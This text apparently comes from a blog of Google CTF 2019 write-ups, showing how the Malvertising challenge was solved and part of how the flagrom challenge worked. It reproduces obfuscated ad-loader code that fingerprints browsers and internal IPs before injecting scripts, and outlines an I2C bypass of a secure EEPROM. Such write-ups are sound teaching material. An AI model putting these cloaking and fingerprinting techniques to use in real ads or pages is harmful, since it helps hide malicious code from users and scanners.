All we have to do now is iterate this list and use each entry as a key to decrypt the given encrypted flag – U2FsdGVkX1/andRK+WVfKqJILMVdx/69xjAzW4KUqsjr98GqzFR793lfNHrw1Blc8UZHWOBrRhtLx3SM38R1MpRegLTHgHzf0EAa3oUeWcQ=. Then, look for the substring ‘CTF’ in the decrypted data.

Fortunately, one of our keys, 11110001110011111001111111000100101111110011010111011001111010 (0x3c73e7f12fcd767a) decrypted the encrypted flag into such text:

stsio@stsio:/tmp/openssl-1.1.1a⟫ echo "U2FsdGVkX1/andRK+WVfKqJILMVdx/69xjAzW4KUqsjr98GqzFR793lfNHrw1Blc8UZHWOBrRhtLx3SM38R1MpRegLTHgHzf0EAa3oUeWcQ=" | openssl enc -aes-256-cbc -d -pbkdf2 -md sha1 -base64 -pass file:/tmp/3c73e7f12fcd767a.key
CTF{reversing_cellular_automatas_can_be_done_bit_by_bit}

Flag: CTF{reversing_cellular_automatas_can_be_done_bit_by_bit}

Malvertising

Unravel the layers of malvertising to uncover the Flag

https://malvertising.web.ctfcompetition.com/

Challenge overview

When we open the link we encounter a page that looks like a youtube page but after inspecting the source we can see that the page is built from a photo and an iframe.

...
<html>
...
<head>
...
  <style>
  body {
          background-image: url("bg.png");
          ...
  }
...
  </style>
</head>
<body>
...
<iframe src="ads/ad.html" width="852" height="239" frameBorder="0" scrolling="no"></iframe>
...
</body>
</html>

First Level

At this point it’s unclear what our goal is in this challenge so we just researched the iframe and hoped for the best.
Upon inspecting the iframe we can see a few interesting things:

<!DOCTYPE html>
<html>
...
<body>
...
<script id="adjs" src="./src/metrics.js" type="text/javascript"></script>
<img width=1 height=1 src="./src/apY7ERVvTFvgbHPbDwSC/1x1.png">
<img style="visibility:hidden;display:none;" height="1" width="1" />
<iframe src="bh/drts.png?drts=110322201473" ...>
</iframe>
<iframe src="bh/drts.png?drts=120322201473" ...>
</iframe>
<iframe src="bh/drts.png?drts=130322201473" ...>
</iframe>

Several things that caught our attention:

  • metrics.js
  • 1×1.png
  • 3 iframes that seem to contain nothing

1×1.png always returned an empty response.
We’ve tried playing with the drts parameter but it seems like the response was always empty so we left it.

It was time to investigate metrics.js.
Browsing the metrics.js code the following snippet at the end of the file caught our attention:

var s = b('0x16', '%RuL');
var t = document[b('0x17', 'jAUm')](b('0x18', '3hyK'));
t[b('0x19', 'F#*Z')] = function() {
    try {
        var u = steg[b('0x1a', 'OfTH')](t);
    } catch (v) {}
    if (Number(/\x61\x6e\x64\x72\x6f\x69\x64/i[b('0x1b', 'JQ&l')](navigator[b('0x1c', 'IfD@')]))) {
        s[s][s](u)();
    }
}
;

It seems like there is some access to the DOM. To figure out what this code does we’ve decided to set a breakpoint and decode the strings. We’ve set a breakpoint at the beginning of that snippet and inspected the strings.

Replacing the encoded string with decoded ones makes it easy to see what the script does:

var s = 'constructor';
var t = document['getElementById']('adimg');
t['onload'] = function() {
    try {
        var u = steg['decode'](t);
    } catch (v) {}
    if (Number(/\x61\x6e\x64\x72\x6f\x69\x64/i['test'](navigator['userAgent']))) {
        s[s][s](u)();
    }
}

The code extracts data (later to be discovered as javascript code) from the img known as adimg and saves it to the variable u. It then runs a regex on our user agent and if a match is found then it runs the javascript code stored in u.
You can see that our regex is actually ascii and \x61\x6e\x64\x72\x6f\x69\x64 is just android.

So what this code basically does is check if we have the word android (case insensitive) in our user agent and if we do it runs the code in u.
So what does u contain? We can just set a breakpoint and see:

var dJs = document.createElement('script'); dJs.setAttribute('src','./src/uHsdvEHFDwljZFhPyKxp.js'); document.head.appendChild(dJs);

To sum up, if we have the string android in our user agent a script will be added & executed to our page.

We’ll just execute u ourselves and we’re past the first level.

Second Level

The second level introduces a small script with several functions:

var T = {};
T.e0 = function(a, b) {
    // ...
}
,
T.d0 = function(a, b) {
    // ...
}
,
T.e1 = function(a, b) {
       // ...
}
,
T.d1 = function(a, b) {
    // ...
}
,
T.f0 = function(a) {
    // ...
}
,
T.longsToStr = function(a) {
    // ...
}

function dJw() {
    try {
        return navigator.platform.toUpperCase().substr(0, 5) + Number(/android/i.test(navigator.userAgent)) + Number(/AdsBot/i.test(navigator.userAgent)) + Number(/Google/i.test(navigator.userAgent)) + Number(/geoedge/i.test(navigator.userAgent)) + Number(/tmt/i.test(navigator.userAgent)) + navigator.language.toUpperCase().substr(0, 2) + Number(/tpc.googlesyndication.com/i.test(document.referrer) || /doubleclick.net/i.test(document.referrer)) + Number(/geoedge/i.test(document.referrer)) + Number(/tmt/i.test(document.referrer)) + performance.navigation.type + performance.navigation.redirectCount + Number(navigator.cookieEnabled) + Number(navigator.onLine) + navigator.appCodeName.toUpperCase().substr(0, 7) + Number(navigator.maxTouchPoints > 0) + Number((undefined == window.chrome) ? true : (undefined == window.chrome.app)) + navigator.plugins.length
    } catch (e) {
        return 'err'
    }
}
;a = "A2xcVTrDuF+EqdD8VibVZIWY2k334hwWPsIzgPgmHSapj+zeDlPqH/RHlpVCitdlxQQfzOjO01xCW/6TNqkciPRbOZsizdYNf5eEOgghG0YhmIplCBLhGdxmnvsIT/69I08I/ZvIxkWyufhLayTDzFeGZlPQfjqtY8Wr59Lkw/JggztpJYPWng=="
eval(T.d0(a, dJw()));

Lets try to decode the a variable:

> echo "A2xcVTrDuF+EqdD8VibVZIWY2k334hwWPsIzgPgmHSapj+zeDlPqH/RHlpVCitdlxQQfzOjO01xCW/6TNqkciPRbOZsizdYNf5eEOgghG0YhmIplCBLhGdxmnvsIT/69I08I/ZvIxkWyufhLayTDzFeGZlPQfjqtY8Wr59Lkw/JggztpJYPWng==" | base64 -D
��!!����f�O��#���E���Kk$��W�fS�~:�cū�����`�;i%�֞

The variable seems to be encrypted.
Judging by how it’s used it seems like T.d0 is some sort of decryption routine using the output of dJw() as key.
To continue we’ll probably have to figure out how to decrypt a.

Bruteforcing the Key

The key is built from the following things:

  • navigator.platform.toUpperCase().substr(0, 5) 5 chars (probably LINUX or ANDRO considering the if statement we had in level 1)
  • Number(/android/i.test(navigator.userAgent)) 1 char (2 options 1 or 0)
  • Number(/AdsBot/i.test(navigator.userAgent)) 1 char (2 options 1 or 0)
  • Number(/Google/i.test(navigator.userAgent)) 1 char
  • Number(/geoedge/i.test(navigator.userAgent)) 1 char
  • Number(/tmt/i.test(navigator.userAgent)) 1 char
  • navigator.language.toUpperCase().substr(0, 2) 2 chars
  • Number(/tpc.googlesyndication.com/i.test(document.referrer) || /doubleclick.net/i.test(document.referrer)) 1 char
  • Number(/geoedge/i.test(document.referrer)) 1 char
  • Number(/tmt/i.test(document.referrer)) 1 char
  • performance.navigation.type according to MDN, can only be 0, 1, 2 or 255
  • performance.navigation.redirectCount [0,∞)
  • Number(navigator.cookieEnabled) 1 char
  • Number(navigator.onLine) 1 char
  • navigator.appCodeName.toUpperCase().substr(0, 7) 7 chars, and can only be MOZILLA according to MDN
  • Number(navigator.maxTouchPoints > 0) 1 char
  • Number((undefined == window.chrome) ? true : (undefined == window.chrome.app)) 1 char
  • navigator.plugins.length [0,∞)

We were a bit worried about the unlimited options for the plugins & redirect count so we decided to look at the decrypt function:

T.d0 = function(a, b) {
    var c, d;
    return a = String(a),
    b = String(b),
    0 == a.length ? '' : (c = T.f0(a.b1()),
    d = T.f0(b.u0().slice(0, 16)),
    c.length,
    c = T.d1(c, d),
    a = T.longsToStr(c),
    a = a.replace(/\0+$/, ''),
    a.u1())
}

considering b as the key, we can see that its converted to a string and then the only usage of b is in the following statement d = T.f0(b.u0().slice(0, 16))

u0 is just encoding the string:

'undefined' == typeof String.prototype.u0 && (String.prototype.u0 = function() {
    return unescape(encodeURIComponent(this))
}

Which means only the first 16 chars of the encoded key are used in the encryption & decryption process.
Given our knowledge of dJw – our key function, we know that there are no special characters in our key, that means only the first 16 chars of the actual key are used, which actually solves our problem with the redirects & plugins.
At this point we believed we had enough to write code in order to bruteforce the key.
Our bruteforce code:

// pads number
function pad(x,n) {
    return '0'.repeat(n-x.length) + x;
}
// generates a list of integers
// in range [0, num-1] in binary string
function generate_bits(num, n_pad) {
    var l = [];
    for(var i=0;i<num;i++){
        l.push(pad(num_to_binary(i), n_pad));
    }
    return l;
}
// converts an integer to binary string
function num_to_binary(num){
    return Number(num).toString(2);
}
// navigator.platform.toUpperCase().substr(0, 5)
var platform = ['LINUX', 'ANDRO'];
// first 5 regexes
var first_part = generate_bits(2**5, 5);
// navigator.language.toUpperCase().substr(0, 2)
var possible_languages = ["EN","FR", "ES" /*...*/];
var second_part = generate_bits(2**3, 3);
// can't be 255 since we only use 16 chars
var performance_type = ['0', '1','2'];

// each of the options
var vals=[];
platform.forEach(function(_pt) {
    first_part.forEach(function(_ft){
        possible_languages.forEach(function(_pl){
            second_part.forEach(function(_sp){
                performance_type.forEach(function(_t){
                    vals.push(_pt+_ft+_pl+_sp+_t);
                });
            }); 
        }); 
    });
});
console.log(vals.length);

// actual bruteforce
vals.forEach(function(v){
    eval(T.d0(a, v));
});

We ran the script in the context of the iframe and suddenly this happened:

We got hit with an anti-debugging mechanism and a third script was added to DOM.

We can display an alert to show the code executed by our eval:

var dJs = document.createElement('script'); dJs.setAttribute('src','./src/npoTHyBXnpZWgLorNrYc.js'); document.head.appendChild(dJs);

The code simply adds the script with no other side effects.

Third Level

The last level made us scratch our heads for a bit, and we decided to try and deobfuscate the script.
First thing we had in mind is trying to deobfuscate the strings in the script and see what we can collect from there. Going up a level in the backtrace of the anti debugging code we can observe the following line:

  [_0x5877('0x72', '\x31\x23\x65\x40')](_0x5877('0x73', '\x52\x32\x4f\x54') + _0x5877('0x74', '\x62\x35\x52\x23'))[_0x5877('0x75', '\x75\x49\x67\x68')](_0x5877('0x76', '\x52\x32\x4f\x54'));

It’s quite clear that the _0x5877 method decodes the strings, so we’ve decided to write a runtime script to decode them using the _0x5877 method. Our deobfuscating script:

// our obfuscated js
var _obfuscated_js = /*our obfuscated js*/"...";
/*_0x5877('0x72', '\x31\x23\x65\x40')*/
// method regex per example above
var reg = /_0x5877\([^)]+\)/ig;

m = reg.exec(_obfuscated_js);
var deobfuscated = _obfuscated_js;
// go over all matches
while(m) {
    var method_call = m[0];
    // replace method call with string
    deobfuscated = deobfuscated.replace(method_call, '\''+eval(method_call)+'\'')
    m = reg.exec(_obfuscated_js);
}

Browsing the deobfuscated script reveals something fairly interesting towards the end:

var _0x14d30a = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/;
                var _0x4f8041 = _0x14d30a['exec'](candidate)[0x1];
                if (_0x4f8041) {
                    if (_0x4f8041['match'](/192.168.0.*/)) {
                        var _0xb9e15d = document['createElement']('script');
                        _0xb9e15d['setAttribute']('src', './src/WFmJWvYBQmZnedwpdQBU.js');
                        document['\x68\x65\x61\x64']['appendChild'](_0xb9e15d);
                    }
                }

It seems like the script uses WebRTC to determine your internal IPv4 address, and if it’s in 192.168.0.0/24 it adds a script to the DOM.
Lets see what’s in the script:

alert("CTF{I-LOVE-MALVERTISING-wkJsuw}")

And that concludes the malvertising challenge.

Summary

The challenge introduced several browser fingerprinting methods covered by obfuscation unravled layer by layer. We had a lot of fun solving this challenge and look forward to see how other teams solved it.

flagrom

In Google’s 2019 CTF competition, a few hardware challenges were introduced. This is a detailed write-up for the flagrom challenge.

If you’re only interested in the bugs and the solution – there’s a TL;DR section for you! 🙂

First, we will go over the files the challenge presents, dissect them, and try to understand what we’re up against.

Once we’ve established that, we’ll understand how everything is supposed to work, and how to break it.

Finally, we’ll show the bugs and our way of solving the challenge.

We’ve tried to explain the challenge in detail, but not bloat it with code – we hope we nailed it – feedbacks are most welcome! If you spot any mistakes – please let us know!

The challenge requires knowledge in Verilog and I2C. If you are not familiar with these – we’ve tried to cover these subjects briefly in Appendices A and B accordingly, to help you gain the minimal knowledge required in order to understand and solve the challenge.

The implementation of our solution is written in C and Python.

We hope you’ll find this both fun and educating as we did 🙂 – Thanks Google for a great CTF, we enjoyed the ride!

TL;DR – Show me the money (SPOILERS)

If you’re only interested in what went wrong, here’s a summary for you:

  • i2c_address_valid in seeprom.sv is not properly set in the state machine and the check could be bypassed by jumping right to I2C_START.
  • I2C_READ does not check if the current read address is secure or not – only that we don’t cross secure and non-secure bank boundaries.
  • RAW_I2C_SCL and RAW_I2C_SDA lines are available – we can bit-bang them to bypass the MMIO interface and talk directly to the I2C bus (this mimics connecting to the bus physically).
  • The solution is to start reading a byte from the first block, securing it, and then keep on reading until the end of the second block. This works if we create our own interface using the I2C lines, and skip the “stop” action / force a start to jump without resetting i2c_address_valid.

You can jump right to the end where we present the bugs in details and the exploit code.

What are we up against?

Analyzing the files

Clicking on the challenge, we are faced with the following message:

This 8051 board has a SecureEEPROM installed. It's obvious the flag is stored there. Go and get it.

8051? SecureEEPROM? OK, that doesn’t sound so bad, let’s grab those files!

The zip archive contains 4 files:

  • firmware.8051
  • firmware.c
  • flagrom
  • seeprom.sv

Let’s start with the obvious – firmware.c is some C source code. seeprom.sv is SystemVerilog – “what is .sv file” – first answer on Google, and anyone who knows Verilog would recognize that syntax. firmware.8051 is a binary blob. The suffix suggests this is some 8051 firmware file. flagrom is an ELF we can run. When we run it, we are asked to present a proof-of-work, just like we would if we’d try to connect to the real server (nc flagrom.ctfcompetition.com 1337), so we can assume that is the actual challenge running on the server.

Running the challenge

The proof-of-work can be computed pretty easily with the following Python code:

def get_pow(prefix):
    m = hashlib.md5()
    for c1 in string.printable:
        for c2 in string.printable:
            for c3 in string.printable:
                for c4 in string.printable:
                    for c5 in string.printable:
                        s = 'flagrom-' + c1 + c2 + c3 + c4 + c5
                        if hashlib.md5(s).hexdigest().startswith(prefix):
                            return s

This mechanism is in place so people won’t overload the competition’s servers, so we won’t dwell on its efficiency.

Once we present our proof-of-work, we are asked to specify a payload length, and then send the payload:

What's the length of your payload?
5
12345
Executing firmware...
[FW] Writing flag to SecureEEPROM...............DONE
[FW] Securing SecureEEPROM flag banks...........DONE
[FW] Removing flag from 8051 memory.............DONE
[FW] Writing welcome message to SecureEEPROM....DONE
Executing usercode...

The information we can gather from this log:

  • We can upload our own code. Which code exactly and to what end, we still don’t know.
  • The flag is being written to a SecureEEPROM, its bank is getting secured, and then it’s removed from some 8051 memory.
  • Our code is seemingly getting executed after the flag was written to the SecureEEPROM.

We already have multiple evidence to suggest that the code we need to upload is in fact 8051 assembly, and we can confirm our assumption by uploading the firmware.8051 file and see what happens. Before we do just that – let’s see what the file contains, to better understand the effect of the file we’re about to upload.

Analyzing the firmware files

ubuntu@ubuntu:~/ctfs/google2019/flagrom$ file firmware.8051 
firmware.8051: data

running file command does not yield any helpful hint here, so let’s take a hex-look (xxd firmware.8051 | less). We won’t show the hex-dump for brevity, but besides some hex-bytes which are probably 8051 code, we are being greeted with some strings:

ubuntu@ubuntu:~/ctfs/google2019/flagrom$ strings firmware.8051
`.t@/
`,t@/
[FW] Writing flag to SecureEEPROM...............
VERIFY FAIL
DONE
[FW] Securing SecureEEPROM flag banks...........
[FW] Removing flag from 8051 memory.............
Hello there.
[FW] Writing welcome message to SecureEEPROM....

These seem rather familiar… We just saw them being printed after we finished uploading our payload! Before we jump right in to IDA, there’s another file file we need to pay a visit to – firmware.c. Once you take a short glance at the code, it’s quickly apparent that these strings are present there as well, and we can carefully assume that the firmware.8051 file is in fact a 8051 compiled version for firmware.c. There’s no point in showing the whole source code here, so we’ll assume you have it handy, and elaborate where necessary.

main calls 4 functions:

  write_flag();
  secure_banks();
  remove_flag();
  write_welcome();

The names are pretty self-explanatory, so we’ll cover the important parts one by one.

write_flag

write_flag uses the seeprom_write_byte function:

void seeprom_write_byte(unsigned char addr, unsigned char value) {
  seeprom_wait_until_idle();

  I2C_ADDR = SEEPROM_I2C_ADDR_MEMORY;
  I2C_LENGTH = 2;
  I2C_ERROR_CODE = 0;
  I2C_DATA[0] = addr;
  I2C_DATA[1] = value;
  I2C_RW_MASK = 0b00;  // 2x Write Byte

  I2C_STATE = 1;
  seeprom_wait_until_idle();
}

The function has two arguments – one address byte, and one data byte. It then uses what seems like MMIO in the CPU, to communicate with an I2C controller, which in turn communicates with the SecureEEPROM. In case it isn’t clear:

|-----|   |----------------|   |---------|
| CPU |-->| I2C Controller |-->| SEEPROM |
|-----|   |----------------|   |---------|

(From now on we’ll use SecureEEPROM / SEEPROM interchangeably).

How do we know that?

  • The code specifically mentions I2C… 🙂
  • The I2C_ADDR = SEEPROM_I2C_ADDR_MEMORY; line indicates we intend to communicate with the SEEPROM device.

If you are not familiar with I2C, you can refer to Appendix B of this write-up.

To clarify very briefly – you can imagine the I2C controller like a (very) small router. Multiple devices can be connected to it, and each device has an internal “I2C Address”. So when we want to communicate with device A, we need to specify “Talk to device A, Let him know that X”. Instead of using 4 bytes as IP addresses, it usually uses 7 bits for addressing, and one bit to specify write/read (0/1) operation. The communication is done on the I2C bus, which is simply 2 lines delivering a clock signal and data.

If we take a look at the beginning of the code, we can see these definitions:

// I2C-M module/chip control data structure.
__xdata __at(0xfe00) unsigned char I2C_ADDR; // 8-bit version.
__xdata __at(0xfe01) unsigned char I2C_LENGTH;  // At most 8 (excluding addr).
__xdata __at(0xfe02) unsigned char I2C_RW_MASK;  // 1 R, 0 W.
__xdata __at(0xfe03) unsigned char I2C_ERROR_CODE;  // 0 - no errors.
__xdata __at(0xfe08) unsigned char I2C_DATA[8];  // Don't repeat addr.
__sfr __at(0xfc) I2C_STATE;  // Read: 0 - idle, 1 - busy; Write: 1 - start

So indeed, an MMIO that provides an I2C communication interface.

In the seeprom_write_byte code, we specify that we want to communicate with the SEEPROM device (SEEPROM_I2C_ADDR_MEMORY), Writing 2 bytes to it – one address byte (I2C_DATA[0]), and one data byte (I2C_DATA[1]). Don’t let the various addresses confuse you! The I2C_ADDRESS is “package destination”, and the package contains I2C_DATA. Since our destination is an EEPROM device (a fancy name for storage device) – we want to let it know – go to your memory at address X (index), and write byte Y.

The other MMIO values are relatively self-explanatory:

  • I2C_LENGTH = 2; – We relay 2 bytes into the SEEPROM device
  • I2C_RW_MASK = 0b00; – We use the send operation twice to deliver data to the SEEPROM
  • I2C_STATE = 1; – Everything is ready to go – take the package and deliver it!

seeprom_wait_until_idle simply waits until the delivery operation is finished – the I2C controller changes the I2C_STATE back to 0 when it’s idle.

Back to write_flag – notice how it writes the flag:

seeprom_write_byte(64 + i, FLAG[i]);

The code writes the flag to the SEEPROM, starting at address 64, and the data written is taken from the “FLAG” global/MMIO –

__xdata __at(0xff00) unsigned char FLAG[0x100];

secure_banks

The next function main calls is secure_banks. It calls the seeprom_secure_banks like so:

seeprom_secure_banks(0b0010);  // Secure 64-byte bank with the flag.

The comment suggests the SEEPROM is divided into 64-byte storage banks – we’ll use that information later. Let’s take a look at what seeprom_secure_banks does:

void seeprom_secure_banks(unsigned char mask) {
  seeprom_wait_until_idle();

  I2C_ADDR = SEEPROM_I2C_ADDR_SECURE | (mask & 0b1111);
  I2C_LENGTH = 0;
  I2C_ERROR_CODE = 0;

  I2C_STATE = 1;
  seeprom_wait_until_idle();
}

This function seemingly addresses another device – SEEPROM_I2C_ADDR_SECURE (unlike the regular SEEPROM_I2C_ADDR_MEMORY), and the 4 lower bits are masked with our mask argument. The code does not seem to read or write anything from this device at all, so we can assume the mere action of “calling” this device does something – probably locks a bank to make it secure.. :).

The secure_banks function then attempts to verify it cannot read the flag it has just stored:

  // Verify that the flag can NOT be read.
  for (i = 0; FLAG[i] != '\0'; i++) {
    if (seeprom_read_byte(64 + i) == FLAG[i]) {
      print("VERIFY FAIL\n");
      POWEROFF = 1;
    }
  }

So this action has indeed secured the flag. In fact, it’s entire memory bank, starting at address 64, ending at 128 – since this a 64 byte bank. From the information we gathered so far, we can deduce there are 4 banks of 64-bytes each, every one of them can be secured individually. How do we know that?

  • The comment mentioned Secure 64-byte bank
  • The flag starts at address 64 (2nd bank), and the mask we provided to lock was 0010 – Second bit.

remove_flag & write_welcome

The rest of the code is relatively less interesting –
remove_flag removes the original flag from memory. This means the flag is still secure in the SEEPROM, but it is not available anymore in plain memory, nor it is possible to read it from the SEEPROM, since we secured the bank. This prevents an attempt to upload and execute 8051 code that will simply read the flag straight from memory, or attempt to read it from the SEEPROM.
write_welcome Simply writes a welcome message into the first SEEPROM bank (which is non-secure).

To sum everything up to this point – the firmware.c code does the following:

  • Reads a FLAG from some pre-mapped memory
  • Stores the flag in a SEEPROM bank using I2C
  • Secures the bank
  • Removes the FLAG from memroy

An alternative interface?

If we read the entire C code, 2 interesting MMIO addresses pop-up:

__sfr __at(0xfa) RAW_I2C_SCL;
__sfr __at(0xfb) RAW_I2C_SDA;

These provide access to the I2C controller clock and data lines. This is somewhat peculiar, as we already have a well-defined interface to communicate with the I2C controller. That’s our first clue – we can probably bit-bang these lines to communicate with the controller independently and hopefully break things.

In practice, this sort of mimics a scenario where an attacker has physical access to an I2C bus, something that is very well possible.

Analyzing flagrom & the challenge

Since we see the various strings from firmware.c being printed when running the flagrom file or connecting to the challenge server, we can assume it’s running this firmware somehow (it’s 8051, mind you – not x86).

Now let’s verify our assumptions with IDA:

int __cdecl main(int argc, const char **argv, const char **envp)
{
    ...

  read_proof_of_work();
  read_usercode();
  read_firmware();
  read_flag();
  dev_i2c = seeprom_new(v3, 0LL);
  seeprom_write_scl(dev_i2c, 1LL);
  seeprom_write_sda(dev_i2c, 1LL);
  puts("Executing firmware...");
  emu8051::emu8051((emu8051 *)&v5);
  init_emu((emu8051 *)&v5);
  emu8051::mem_write(&v5, 3LL, 0LL, &firmware, 10000);
  emu8051::mem_write(&v5, 2LL, 0xFF00LL, &flag, 128LL);
  memset(&flag, 0, 0x80uLL);
  done_marker = 0;
  while ( !done_marker )
    emu8051::execute((emu8051 *)&v5, 1u);
  emu8051::~emu8051((emu8051 *)&v5);
  remove_flag();
  puts("Executing usercode...");
  emu8051::emu8051((emu8051 *)&v5);
  init_emu((emu8051 *)&v5);
  emu8051::mem_write(&v5, 3LL, 0LL, &usercode, 10000);
  v6 = 100000;
  done_marker = 0;
  for ( i = 0; i <= 99999 && !done_marker; ++i )
    emu8051::execute((emu8051 *)&v5, 1u);
  emu8051::~emu8051((emu8051 *)&v5);
  seeprom_free(dev_i2c);
  puts("\nClean exit.");
  return 0;
}

So flagrom does the following:

  • Reads the proof-of-work.
  • Reads the usercode (that’s the code we are being asked to upload).
  • Reads the firmware file. A sneak peek tells us it reads the firmware.8051 file.
  • Reads the flag. A sneak peek tells the local copy of the flag is different 😉 – 0n the real server the flag is loaded here..
  • Starts the SEEPROM device. It does so by using Verilator. To quote the site – “Verilator compiles synthesizable SystemVerilog … into single- or multithreaded C++ or SystemC code”. So what probably happened is that seeprom.sv (which we know is SystemVerilog) was compiled with some magic powder to mimic a SEEPROM device in C code.
  • Initializes a 8051 emulator… Voila! Indeed 8051 CPU is being used here. The firmware is loaded into address 0 of the emulator, and the flag is loaded into address 0xFF00. If you’ll take a look back at FLAG definition in firmware.c – you’ll find it specifies __at(0xff00) – matching exactly the address where we see the flag is being written to.
  • Executes the original firmware.8051 file (which matches firmware.c)
  • Removes flag from memory, to make extra sure we don’t read the flag off the memory (even though the original firmware took care of it as well).
  • Executes the usercode which is supposed to be in 8051 assembly. This is where we go in, after the flag has been removed from plain memory and secured inside the SEEPROM.

At this point, we starting to grasp what is required of us. We have an example firmware.c file which we can start to modify, upload and execute to conduct experiments, and we know there’s a mysterious SEEPROM we need to haxx. It is very safe to assume we got the source code for the SEEPROM at seeprom.sv.

In case you want to play around and compile the firmware – this line should get you covered:

sdcc firmware.c -o firmware.o && objcopy -I ihex -O binary firmware.o my_firmware.8051

How does it work?

Analyzing SEEPROM implementation

As mentioned, SEEPROM is implemented in SystemVerilog. If you don’t know Verilog at all – we suggest reading Appendix A now, which attempts to explain Verilog using the seeprom.sv file.

A brief overview of code

Looking at the module, we see 4 lines – 3 input lines and 1 output line:

module seeprom (
  input i_clk,
  input logic i_i2c_scl,
  input logic i_i2c_sda,
  output logic o_i2c_sda
);
  • i_clk – This line receives master clock signal.
  • i_i2c_scl, i_i2c_sda – I2C bus input lines.
  • o_i2c_sda – I2C data output line.

So we know this module communicates using I2C. Coupled with our earlier knowledge about the challenge – it makes a lot of sense.

We’ll now explain the function of each of the various wires and registers in the module. Figuring this out takes some reading of the code (this process is not linear), but reading the code once you have reference is easier.

  • mem_storage – The actual storage;
  • mem_secure – 4 bits, probably the mask specifying whether a bank is secure or not;
  • i2c_address – Register containing the address we’re trying to write/read to/from
  • i2c_address_valid – Register specifying if the address is valid (???) – more on that, later ;).
  • i2c_address_secure, i2c_next_address_secure a wire, referring to the current/next bank mask, denoting if the address inside the i2c_address register is in a bank marked as secure.
  • i2c_address_bits, i2c_data_bits, i2c_control_bits – Counters, used to make sure we get 8 bits of data – and then operate.
  • i2c_control – A control byte – This register stores the first byte received from the I2C transaction, and is used to decide which action to perform.
  • i2c_control_prefix – The 4 msb of i2c_control. This yields the action we would like to perform – either I2C_CONTROL_EEPROM or I2C_CONTROL_SECURE – and conforms exactly to the 2 possibilities we saw earlier in firmware.c
  • i2c_data – A register used to store data for reading / writing bytes on the bus.
  • i2c_control_bank – The 4 lsb of i2c_control. When addressing I2C_CONTROL_SECURE this denotes which banks to lock. Again, this conforms exactly to the code found in seeprom_secure_banks.
  • i2c_control_rw – The lsb of i2c_control. When addressing I2C_CONTROL_EEPROM this denotes whether to do a write/read operation.

The next pieces of code that start with always_comb seem like some standard I2C bit bang / state entry, and do not contain any complicated logic. The only thing worth noting is that i2c_start and i2c_stop are controllable by setting the lines to a specific value. This will become useful later.

always_ff @(posedge i_clk) begin
  i2c_last_scl <= i_i2c_scl;
  i2c_last_sda <= i_i2c_sda;
end
always_comb begin
  if (i2c_scl_state == I2C_SCL_STABLE_HIGH) begin
    i2c_start = i2c_last_sda && !i_i2c_sda;
    i2c_stop = !i2c_last_sda && i_i2c_sda;
  end else begin
    i2c_start = 0;
    i2c_stop = 0;
  end
end

The actual interesting part of the code starts here:

always_ff @(posedge i_clk) begin
  ...
  case (i2c_state)
    I2C_IDLE: begin
      if (i2c_start) begin
        i2c_state <= I2C_START;
      end
    end
  ...

This is the core of the SEEPROM operation, and we want to analyze how it works and look for bugs.

Understanding SecureEEPROM operation

When developing in Verilog, we’re usually developing state-machines, that do specific tasks. When dealing with a state machine, it’s really helpful to draw a control-flow graph to start dissecting how it works. It also helps to spot potential problems. We know that the SEEPROM state machine has to perform an I2C operation, so I2C knowledge can greatly assist our understanding of what happens. Here’s a rough sketch of the SEEPROM state machine:

I2C_ACK  -\                                 [read 8 bits]    [send 8 bits]   [read 8 bits]     [read 8 bits]
I2C_NACK -----> I2C_IDLE -> I2C_START -> I2C_LOAD_CONTROL -|-> I2C_READ --> I2C_LOAD_ADDRESS -> I2C_WRITE --
                  ^              ^                         |      ^      |          ^                ^     |
                  |              |                         |      |-------          |                |------
i2c_stop ---------|   i2c_start -|                         -------------------------|

Missing here are transitions to ACK and NACK state, but almost every step in this chain can jump to ACK or NACK, if the action was valid or not. As mentioned, familiarity with I2C can be useful. If you are unfamiliar with I2C please refer to Appendix B.

Notice that i2c_stop and i2c_start operation can be triggered regardless of any previous state, by setting the bus lines to specific values.

Very simply – The I2C protocol looks like the following:
| ADDR | r/w | data |
| 7bit | 1bit | bytes.. |

As seen in firmware.c, we have 3 transaction types – which align with how the state machine operates:

  1. Write Data:
    The write operation consists of 1 control byte, 1 address byte, and variable number of data bytes:
           i2c_start    |      ADDR   | r/w |  |   Address to write (index) |  | Data |  | Data |  | Data |  | Data | | ... |
               |        |   1010000   |  0  |  |              64            |  |  A   |  |  A   |  |  A   |  |  A   | | ... |
               |        |        0xa0       |  |             0x40           |  | 0x41 |  | 0x41 |  | 0x41 |  | 0x41 | | ... |

IDLE  -->    START   -->   LOAD_CONTROL     --->        LOAD_ADDRESS      --->  WRITE                                         (`i2c_stop`) --> IDLE
  1. Secure Bank
    The secure bank operation consists of 1 control byte, which contains the “operation” and the mask. Somewhat less standard, but still works.
             i2c_start    |   ADDR   |  mask  |
                 |        |   0101   |  0010  |
                 |        |        0x52       | 

IDLE  -->      START   -->    LOAD_CONTROL              (`i2c_stop`)---> IDLE
  1. Read Data:
    The read operation is slightly more complicated – we send a 1 control byte to specify a write operation, writing an address to read from. Then, we send another control byte specifying we would like to perform a read operation. Afterwards we start reading bytes from the device.
             i2c_start    |      ADDR   | r/w |  |   Address to read (index)  |     i2c_start         |      ADDR   | r/w |  | Data | | Data | | Data | 
                 |        |   1010000   |  0  |  |              64            |          |            |   1010000   |  1  |  |  A   | |  A   | |  A   | 
                 |        |        0xa0       |  |             0x40           |          |            |        0xa1       |  | 0x41 | | 0x41 | | 0x41 | 

IDLE  -->      START   -->  LOAD_CONTROL      --->        LOAD_ADDRESS       --->      START   -->         LOAD_CONTROL   --->   READ                    (`i2c_stop`)--> IDLE

Things to notice:

  • We always start the operation by bit-banging to i2c_start. This sets i2c_start to 1 and starts the state machine operation.
  • A responsible user, should trigger the i2c_stop on the bus, once an operation is finished, to get the device back to an IDLE state properly.
  • The read operation is broken into 2 parts, which are seperated by sending the I2C_START operation again.

Looking for bugs…

We now have a relatively good understand of how every operation of the state machine is supposed to work. So where does it fail? Reminder: we need to bypass the security checks to read from a secure bank.

Bug #1 – A weird read

Once a bank is set as secured, it cannot be unset (follow the mem_secure assignments – you’ll see). So how is the security being enforced? The obvious place to look is the read operation:

...
i2c_data_bits <= 0;
if (i2c_address_secure == i2c_next_address_secure) begin
  `DEBUG_DISPLAY(("READ: i2c_address = 0x%x", i2c_address));
  i2c_address <= i2c_address + 1;
  i2c_state <= I2C_ACK_THEN_READ;
end else begin
  i2c_state <= I2C_NACK;
end
...

